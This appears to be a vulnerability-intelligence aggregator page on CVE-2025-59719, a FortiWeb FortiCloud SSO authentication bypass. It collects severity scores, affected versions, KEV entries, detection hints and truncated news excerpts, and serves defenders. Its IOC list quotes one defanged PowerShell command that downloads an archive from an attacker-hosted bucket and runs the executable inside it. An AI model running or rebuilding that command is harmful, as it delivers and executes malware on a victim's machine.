CVE-2025-59719
published 2025-12-09CVE-2025-59719: An improper verification of cryptographic signature vulnerability in Fortinet FortiWeb 8.0.0, FortiWeb 7.6.0 through 7.6.4, FortiWeb 7.4.0 through 7.4.9 may…
PriorityP191critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
ITWVulnCheck KEV
Exploited in the wild
EPSS
23.67%
97.5th percentile
An improper verification of cryptographic signature vulnerability in Fortinet FortiWeb 8.0.0, FortiWeb 7.6.0 through 7.6.4, FortiWeb 7.4.0 through 7.4.9 may allow an unauthenticated attacker to bypass the FortiCloud SSO login authentication via a crafted SAML response message.
Affected
9 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| fortinet | forticloud | — | — |
| fortinet | fortinet | — | — |
| fortinet | fortios | — | — |
| fortinet | fortiproxy | — | — |
| fortinet | fortiswitchmanager | — | — |
| fortinet | fortiweb | — | — |
| fortinet | fortiweb | — | — |
| fortinet | fortiweb | 7.4.0 – 7.4.9 | — |
| fortinet | fortiweb | 7.6.0 – 7.6.4 | — |
Detection & IOCsextracted from sources · hover to see the quote
commandInvoke-WebRequest -Uri 'hxxps://fastdlvrss[.]s3[.]us-east-1[.]amazonaws[.]com/paswr.zip' -OutFile 'C:\programdata\usoshared\Sysdmupd.zip'; Expand-Archive -Path 'C:\programdata\usoshared\Sysdmupd.zip' -DestinationPath 'c:\programdata\usoshared\' -Force; Remove-Item 'C:\programdata\usoshared\Sysdmupd.zip'; cmd /c 'c:\programdata\usoshared\java.exe';↗
- →Look for FortiGate event log logid='0100044547' showing local admin account creation (e.g., 'secadmin') by [email protected] — indicates post-exploitation persistence. ↗
- →Exploitation is only possible when FortiCloud SSO is enabled; check for 'admin-forticloud-sso-login' setting. The feature activates automatically when devices are registered via FortiCare UI. ↗
- →After SSO authentication, attackers download full device configuration using 'show full-configuration' — monitor for this command in FortiGate CLI/audit logs. ↗
- →Attacks are highly automated — exploitation and config exfiltration occur within seconds of initial access. Correlate rapid sequential events: SSO login → admin account creation → config download. ↗
- →Monitor for creation of local admin accounts named 'audit', 'backup', 'itadmin', 'secadmin', or 'support' on FortiGate devices — these are attacker-created persistence accounts. ↗
- →Attacker-controlled rogue workstations joined to AD domain — hunt for unexpected machine account creation, especially names WIN-X8WRBOSK0OF, WIN-YRSXLEONJY2, WIN-1J7L3SQSTMS. ↗
- →Monitor for a FortiGate process named 'fortidcagent' being abused or unusual activity associated with it during post-exploitation lateral movement. ↗
- →Attacker used 'ssl-admin' VPN account for post-exploitation access — audit VPN user accounts for unexpected entries like 'ssl-admin'. ↗
- →Shadowserver is tracking ~11,000 internet-exposed Fortinet devices with FortiCloud SSO enabled — use Shadowserver data to identify exposed assets in your network. ↗
- ·CVE-2025-59719 only affects FortiWeb; it is NOT exploitable unless FortiCloud SSO is enabled. FortiCloud SSO is not enabled by default but activates automatically when devices are registered via the FortiCare UI. ↗
- ·Third-party SAML IdPs and FortiAuthenticator are NOT impacted by this issue — only FortiCloud SSO is affected. ↗
- ·The initial patch (FortiOS 7.4.9) did not fully address the authentication bypass; a patch bypass was observed in the wild against fully patched devices. FortiOS 7.4.11, 7.6.6, and 8.0.0 were planned to fully remediate. ↗
- ·Attacker SSO login accounts ([email protected], [email protected]) and observed IP addresses may change as Fortinet takes action to neutralize them. ↗
- ·Affected FortiWeb versions: 8.0.0, 7.6.0–7.6.4, 7.4.0–7.4.9. FortiWeb 7.0 and 7.2 are NOT affected by CVE-2025-59719. ↗
CVSS provenance
nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
vulncheck9.8CRITICAL
cisa9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
CISA
Fortinet Multiple Products Improper Verification of Cryptographic Signature Vulnerability
cisa·2025-12-16·CVSS 9.8
CVE-2025-59718 [CRITICAL] CWE-347 Fortinet Multiple Products Improper Verification of Cryptographic Signature Vulnerability
Vulnerability: Fortinet Multiple Products Improper Verification of Cryptographic Signature Vulnerability
Affected: Fortinet Multiple Products
Fortinet FortiOS, FortiSwitchMaster, FortiProxy, and FortiWeb contain an improper verification of cryptographic signature vulnerability that may allow an unauthenticated attacker to bypass the FortiCloud SSO login authentication via a crafted SAML message. Please be aware that CVE-2025-59719 pertains to the same problem and is mentioned in the same vendor advisory. Ensure to apply all patches mentioned in the advisory.
Required Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
Notes: https://fortiguard.fortinet.com/psirt/FG-I
Fortinet
Multiple Fortinet Products' FortiCloud SSO Login Authentication Bypass
vendor_fortinet·2025-12-09·CVSS 9.8
CVE-2025-59718 [CRITICAL] CWE-347 Multiple Fortinet Products' FortiCloud SSO Login Authentication Bypass
FG-IR-25-647: Multiple Fortinet Products' FortiCloud SSO Login Authentication Bypass
A improper verification of cryptographic signature vulnerability in Fortinet FortiOS 7.6.0 through 7.6.3, FortiOS 7.4.0 through 7.4.8, FortiOS 7.2.0 through 7.2.11, FortiOS 7.0.0 through 7.0.17, FortiProxy 7.6.0 through 7.6.3, FortiProxy 7.4.0 through 7.4.10, FortiProxy 7.2.0 through 7.2.14, FortiProxy 7.0.0 through 7.0.21, FortiSwitchManager 7.2.0 through 7.2.6, FortiSwitchManager 7.0.0 through 7.0.5 allows an unauthenticated attacker to bypass the FortiCloud SSO login authentication via a crafted SAML response message.
An improper verification of cryptographic signature vulnerability in Fortinet FortiWeb 8.0.0, FortiWeb 7.6.0 through 7.6.4, FortiWeb 7.4.0 through 7.4.9 may allow an unauthenticated atta
GHSA
GHSA-chq4-235q-jp7w: An improper verification of cryptographic signature vulnerability in Fortinet FortiWeb 8
ghsa_unreviewed·2025-12-09
CVE-2025-59719 [CRITICAL] CWE-347 GHSA-chq4-235q-jp7w: An improper verification of cryptographic signature vulnerability in Fortinet FortiWeb 8
An improper verification of cryptographic signature vulnerability in Fortinet FortiWeb 8.0.0, FortiWeb 7.6.0 through 7.6.4, FortiWeb 7.4.0 through 7.4.9 may allow an unauthenticated attacker to bypass the FortiCloud SSO login authentication via a crafted SAML response message.
VulnCheck
Fortinet Multiple Products Improper Verification of Cryptographic Signature Vulnerability
vulncheck·2025·CVSS 9.8
CVE-2025-59718 [CRITICAL] CWE-347 Fortinet Multiple Products Improper Verification of Cryptographic Signature Vulnerability
Fortinet Multiple Products Improper Verification of Cryptographic Signature Vulnerability
Fortinet FortiOS, FortiSwitchMaster, FortiProxy, and FortiWeb contain an improper verification of cryptographic signature vulnerability that may allow an unauthenticated attacker to bypass the FortiCloud SSO login authentication via a crafted SAML message. Please be aware that CVE-2025-59719 pertains to the same problem and is mentioned in the same vendor advisory. Ensure to apply all patches mentioned in the advisory.
Affected: Fortinet Multiple Products
Required Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
Exploitation References: https://arcticwolf.com/resources/blog/
VulnCheck
Fortinet FortiWeb Improper Verification of Cryptographic Signature
vulncheck·2025·CVSS 9.8
CVE-2025-59719 [CRITICAL] Fortinet FortiWeb Improper Verification of Cryptographic Signature
Fortinet FortiWeb Improper Verification of Cryptographic Signature
An improper verification of cryptographic signature vulnerability in Fortinet FortiWeb 8.0.0, FortiWeb 7.6.0 through 7.6.4, FortiWeb 7.4.0 through 7.4.9 may allow an unauthenticated attacker to bypass the FortiCloud SSO login authentication via a crafted SAML response message.
Affected: Fortinet FortiWeb
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://arcticwolf.com/resources/blog/arctic-wolf-observes-malicious-sso-logins-following-disclosure-cve-2025-59718-cve-2025-59719/; https://www.linkedin.com/posts/drayagha_for-the-latest-fortigate-cves-cve-2025-59718-activity-740721435622628
No detection rules found.
No public exploits indexed.
Hackernews
⚡ Weekly Recap: Browser Bugs, EDR Killers, TV Botnet, OpenBSD Flaw, Android Trojan, and More
blogs_hackernews·2026-06-22·CVSS 9.8
CVE-2026-24858 [CRITICAL] ⚡ Weekly Recap: Browser Bugs, EDR Killers, TV Botnet, OpenBSD Flaw, Android Trojan, and More
Home
Threat Intelligence
Vulnerabilities
Cyber Attacks
Webinars
Expert Insights
Awards
Webinars
Awards
Free eBooks
About THN
Jobs
Advertise with us
## ⚡ Weekly Recap: Browser Bugs, EDR Killers, TV Botnet, OpenBSD Flaw, Android Trojan, and More
It’s Monday again.
This week’s threat list looks painfully familiar: abused integrations, fake tools, poisoned websites, ransomware crews trying to shut down security tools, and mobile malware asking for way too much control.
The annoying part is how little of this feels new. Weak credentials, sketchy downloads, browser extensions with too much access, and WordPress sites are used to push more attacks. Nothing clever. Just sloppy, cheap, and effective.
Here’s the Monday recap. Let’s get into the week’s mess.
## ⚡ Threat of the We
Tenable
Operation Epic Fury: Why exposure data changes everything about Iran's cyber-kinetic campaign
blogs_tenable·2026-03-17
Operation Epic Fury: Why exposure data changes everything about Iran's cyber-kinetic campaign
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
Tenable
Operation Epic Fury: cyber threat data in the Iran War
blogs_tenable·2026-03-17·CVSS 7.8
[HIGH] Operation Epic Fury: cyber threat data in the Iran War
Blog / Cyber Exposure Alerts
Subscribe
# Operation Epic Fury: Why exposure data changes everything about Iran's cyber-kinetic campaign
Robert Huber
March 17, 2026
13 Min Read
Iran's retaliatory campaign following Operation Epic Fury has collapsed the boundary between physical and digital warfare. Tenable's exposure data analysis across seven target countries reveals that the largest exploitable attack surface isn't the headline threat, it's a Microsoft Word N-day affecting nearly 14 million assets.
## Key takeaways:
1. Exposure data rebalances the threat picture. A Microsoft Word N-day (CVE-2026-21514) accounts for nearly 14 million of the 15.5 million affected assets across the seven target countries, two orders of magnitude more than the conflict's headline threats. Organizations
Sentinelone
FortiGate Edge Intrusions | Stolen Service Accounts Lead to Rogue Workstations and Deep AD Compromise
blogs_sentinelone·2026-03-10
FortiGate Edge Intrusions | Stolen Service Accounts Lead to Rogue Workstations and Deep AD Compromise
## Overview
Throughout early 2026, SentinelOne’s ® Digital Forensics & Incident Response (DFIR) team has responded to several incidents where FortiGate Next-Generation Firewall (NGFW) appliances have been compromised to establish a foothold into the targeted environment. Each incident was detected and stopped during the lateral movement phase of the attack.
Fortinet has disclosed and issued patches for several high-severity vulnerabilities allowing unauthorized access during the activity period of our investigations. Successful exploitation of these flaws allows an attacker to extract the configuration file from the FortiGate appliance, which frequently contains service account credentials and valuable network topology information for the targeted environment.
We observed a consistent t
Sentinelone
FortiGate Edge Intrusions | Stolen Service Accounts Lead to Rogue Workstations and Deep AD Compromise
blogs_sentinelone·2026-03-10
FortiGate Edge Intrusions | Stolen Service Accounts Lead to Rogue Workstations and Deep AD Compromise
## Overview
Throughout early 2026, SentinelOne’s® Digital Forensics & Incident Response (DFIR) team has responded to several incidents where FortiGate Next-Generation Firewall (NGFW) appliances have been compromised to establish a foothold into the targeted environment. Each incident was detected and stopped during the lateral movement phase of the attack.
Fortinet has disclosed and issued patches for several high-severity vulnerabilities allowing unauthorized access during the activity period of our investigations. Successful exploitation of these flaws allows an attacker to extract the configuration file from the FortiGate appliance, which frequently contains service account credentials and valuable network topology information for the targeted environment.
We observed a consistent th
Checkpoint
26th January – Threat Intelligence Report
blogs_checkpoint·2026-01-26
CVE-2025-68143 26th January – Threat Intelligence Report
Latest Publications
CPR Podcast Channel
AI Research
Web 3.0 Security
Intelligence Reports
ThreatCloud AI
Threat Intelligence & Research
Zero Day Protection
Sandblast File Analysis
About Us
SUBSCRIBE
2026
2025
2024
2023
2022
2021
2020
2019
2018
2017
2016
## 26th January – Threat Intelligence Report
For the latest discoveries in cyber research for the week of 26th January, please download our Threat Intelligence Bulletin.
TOP ATTACKS AND BREACHES
RansomHub ransomware group has claimed responsibility for a cyber-attack on Luxshare, an electronics manufacturer of Apple, Nvidia, LG, Tesla, and others. The threat actors claimed access to 3D CAD models, circuit board designs, and engineering documentation. The company has not yet confirmed the breach.
Check Point Threa
Bleepingcomputer
Hackers breach Fortinet FortiGate devices, steal firewall configs
blogs_bleepingcomputer·2026-01-22·CVSS 9.8
[CRITICAL] Hackers breach Fortinet FortiGate devices, steal firewall configs
## Hackers breach Fortinet FortiGate devices, steal firewall configs
## Sergiu Gatlan
Fortinet FortiGate devices are being targeted in automated attacks that create rogue accounts and steal firewall configuration data, according to cybersecurity company Arctic Wolf.
The campaign started last week, on January 15, with the attackers exploiting an unknown vulnerability in the devices' single sign-on (SSO) feature to create accounts with VPN access and exporting firewall configurations within seconds, indicating automated activity.
Arctic Wolf, which reported these incidents on Wednesday , says the attacks are very similar to incidents it documented in December following the disclosure of a critical authentication bypass vulnerability (CVE-2025-59718) in Fortinet products.
That flaw allow
Fortinet
Analysis of Single Sign-On Abuse on FortiOS | Fortinet Blog
blogs_fortinet·2026-01-22·CVSS 9.8
[CRITICAL] Analysis of Single Sign-On Abuse on FortiOS | Fortinet Blog
PSIRT BLOGS
Analysis of Single Sign-On Abuse on FortiOS
By Carl Windsor | January 22, 2026
Incident Updates:
January 23: Fortinet disabled FortiCloud accounts that were being abused as part of the attack.
January 26: Fortinet disabled FortiCloud SSO to prevent abuse.
January 27: Fortinet issued Public Advisory
January 27: FortiCloud SSO access restored; however, it will no longer support access from vulnerable devices. Please follow the upgrade advice specified in the Public Advisory.
January 28: Confirmed that third-party SAML IdPs and FortiAuthenticator are not impacted by this issue. Blog text below has been amended accordingly.
January 30: Fortinet updated the Public Advisory with the last of the release updates.
In December 2025, Fortinet issued an advisory related to two For
Wiz
Crying Out Cloud Monthly Newsletter - January 2026 | Wiz
blogs_wiz·2026-01-22·CVSS 8.7
CVE-2025-55182 [HIGH] Crying Out Cloud Monthly Newsletter - January 2026 | Wiz
Welcome back! In this edition, we bring you the latest in cloud security: noteworthy incidents, exclusive data, and crucial vulnerabilities. Let’s jump in.
## 🔍 Highlights
React2Shell: Critical RCE Vulnerability in React and Next.js
React2Shell (CVE-2025-55182) is a critical, unauthenticated remote code execution vulnerability rooted in insecure deserialization within the React Server Components (RSC) “Flight” protocol, impacting React 19 and RSC-enabled frameworks, most notably Next.js. The flaw affects default configurations, meaning standard production deployments can be exploited with a single crafted HTTP request and no developer misconfiguration, with exploitation demonstrating near-100% reliability.
Since early December 2025, exploitation has been observed in the wild by multipl
Checkpoint
22nd December – Threat Intelligence Report
blogs_checkpoint·2025-12-22
CVE-2025-37164 22nd December – Threat Intelligence Report
Latest Publications
CPR Podcast Channel
AI Research
Web 3.0 Security
Intelligence Reports
ThreatCloud AI
Threat Intelligence & Research
Zero Day Protection
Sandblast File Analysis
About Us
SUBSCRIBE
2026
2025
2024
2023
2022
2021
2020
2019
2018
2017
2016
## 22nd December – Threat Intelligence Report
For the latest discoveries in cyber research for the week of 22nd December, please download our Threat Intelligence Bulletin .
TOP ATTACKS AND BREACHES
An adult content platform PornHub has disclosed a data breach linked to analytics provider Mixpanel. The breach exposed more than 200 million records related to Premium users, including email addresses, search, watch, and download histories, locations, and associated video details collected prior to 2021. Pornhub stated
Bleepingcomputer
Over 25,000 FortiCloud SSO devices exposed to remote attacks
blogs_bleepingcomputer·2025-12-19·CVSS 9.8
CVE-2025-59718 [CRITICAL] Over 25,000 FortiCloud SSO devices exposed to remote attacks
## Over 25,000 FortiCloud SSO devices exposed to remote attacks
## Sergiu Gatlan
Internet security watchdog Shadowserver has found over 25,000 Fortinet devices exposed online with FortiCloud SSO enabled, amid ongoing attacks targeting a critical authentication bypass vulnerability.
Fortinet noted on December 9th, when it patched the security flaw tracked as CVE-2025-59718 (FortiOS, FortiProxy, FortiSwitchManager) and CVE-2025-59719 (FortiWeb), that the vulnerable FortiCloud SSO login feature is not enabled until admins register the device with the company's FortiCare support service.
As cybersecurity company Arctic Wolf reported on Monday , the vulnerability is now actively exploited to compromise admin accounts via malicious single sign-on (SSO) logins.
Threat actors are abusing it i
Talos
Adios 2025, you won’t be missed
blogs_talos·2025-12-18
Adios 2025, you won’t be missed
Welcome to this week’s edition of the Threat Source newsletter.
For us in America, we’re in the holiday doldrums and things slow and/or shut down until the new year. At Cisco, we shut down the last week of the year to reset and recharge, and I’ve grown to be quite fond of it. I’ve worked plenty of gigs where there were no holiday breaks, and now that I’m living that dream, I gotta tell ya, it’s a damn civilized way to live if you can get it.
It’s only natural for us to think on 2025 — what happened to us, what made the news, and with some trepidation (and maybe some hope) what lies in store for 2026.
I thought I’d summarize the notable things that come to mind for me:
1. Uncovering Qilin attack methods exposed through multiple cases
Why this one? Quilin is one of the more aggressive ca
Talos
Adios 2025, you won’t be missed
blogs_talos·2025-12-18
Adios 2025, you won’t be missed
## Adios 2025, you won’t be missed
Welcome to this week’s edition of the Threat Source newsletter.
For us in America, we’re in the holiday doldrums and things slow and/or shut down until the new year. At Cisco, we shut down the last week of the year to reset and recharge, and I’ve grown to be quite fond of it. I’ve worked plenty of gigs where there were no holiday breaks, and now that I’m living that dream, I gotta tell ya, it’s a damn civilized way to live if you can get it.
It’s only natural for us to think on 2025 — what happened to us, what made the news, and with some trepidation (and maybe some hope) what lies in store for 2026.
I thought I’d summarize the notable things that come to mind for me:
Uncovering Qilin attack methods exposed through multiple cases Why this one? Quilin
Bleepingcomputer
Hackers exploit newly patched Fortinet auth bypass flaws
blogs_bleepingcomputer·2025-12-16·CVSS 9.8
CVE-2025-59718 [CRITICAL] Hackers exploit newly patched Fortinet auth bypass flaws
## Hackers exploit newly patched Fortinet auth bypass flaws
## Bill Toulas
Hackers are exploiting critical-severity vulnerabilities affecting multiple Fortinet products to get unauthorized access to admin accounts and steal system configuration files.
The two vulnerabilities are tracked as CVE-2025-59718 and CVE-2025-59719, and Fortinet warned in an advisory on December 9 about the potential for exploitation.
CVE-2025-59718 is a FortiCloud SSO authentication bypass affecting FortiOS, FortiProxy, and FortiSwitchManager. It is caused by improper verification of cryptographic signatures in SAML messages, allowing an attacker to log in without valid authentication by submitting a maliciously crafted SAML assertion.
CVE-2025-59719 is a FortiCloud SSO authentication bypass affecting FortiWe
Bleepingcomputer
Fortinet warns of critical FortiCloud SSO login auth bypass flaws
blogs_bleepingcomputer·2025-12-09·CVSS 9.8
CVE-2025-59718 [CRITICAL] Fortinet warns of critical FortiCloud SSO login auth bypass flaws
## Fortinet warns of critical FortiCloud SSO login auth bypass flaws
## Sergiu Gatlan
Fortinet has released security updates to address two critical vulnerabilities in FortiOS, FortiWeb, FortiProxy, and FortiSwitchManager that could allow attackers to bypass FortiCloud SSO authentication.
Threat actors can exploit the two security flaws tracked as CVE-2025-59718 (FortiOS, FortiProxy, FortiSwitchManager) and CVE-2025-59719 (FortiWeb) by abusing improper verification of cryptographic signature weaknesses in vulnerable products via a maliciously crafted SAML message.
However, as Fortinet explained in an advisory published today, the vulnerable FortiCloud feature is not enabled by default when the device is not FortiCare-registered.
"Please note that the FortiCloud SSO login feature is no
Recorded Future
December 2025 CVE Landscape: 22 Critical Vulnerabilities Mark 120% Surge, React2Shell Dominates Threat Activity
blogs_recorded_future·CVSS 7.8
CVE-2025-55182 [HIGH] December 2025 CVE Landscape: 22 Critical Vulnerabilities Mark 120% Surge, React2Shell Dominates Threat Activity
# December 2025 CVE Landscape: 22 Critical Vulnerabilities Mark 120% Surge, React2Shell Dominates Threat Activity
December 2025 witnessed a dramatic 120% increase in high-impact vulnerabilities, with Recorded Future's Insikt Group® identifying 22 vulnerabilities requiring immediate remediation, up from 10 in November. The month was dominated by widespread exploitation of Meta's React Server Components flaw.
What security teams need to know:
- React2Shell pandemonium: CVE-2025-55182 triggered a global exploitation wave with multiple threat actors deploying diverse malware families
- China-nexus exploitation intensifies: Earth Lamia, Jackpot Panda, and UAT-9686 leveraged critical flaws for espionage operations
- Public exploits proliferate: Eleven of 22 vulnerabilities have proof-of-conce
Wiz
CVE-2025-59719 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.8
CVE-2025-59719 [CRITICAL] CVE-2025-59719 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-59719 :
Fortinet FortiWeb vulnerability analysis and mitigation
An improper verification of cryptographic signature vulnerability in Fortinet FortiWeb 8.0.0, FortiWeb 7.6.0 through 7.6.4, FortiWeb 7.4.0 through 7.4.9 may allow an unauthenticated attacker to bypass the FortiCloud SSO login authentication via a crafted SAML response message.
Source : NVD
## 9.8
Score
Published December 9, 2025
Severity CRITICAL
CNA Score 9.8
Affected Technologies
Fortinet FortiWeb
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 27.8
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
cpe:2.3:a:fortinet:fortiweb
Sources
Linux Severity CRITICAL Has Fix Added at: Dec 10, 20
2025-12-09
Published
Exploited in the wild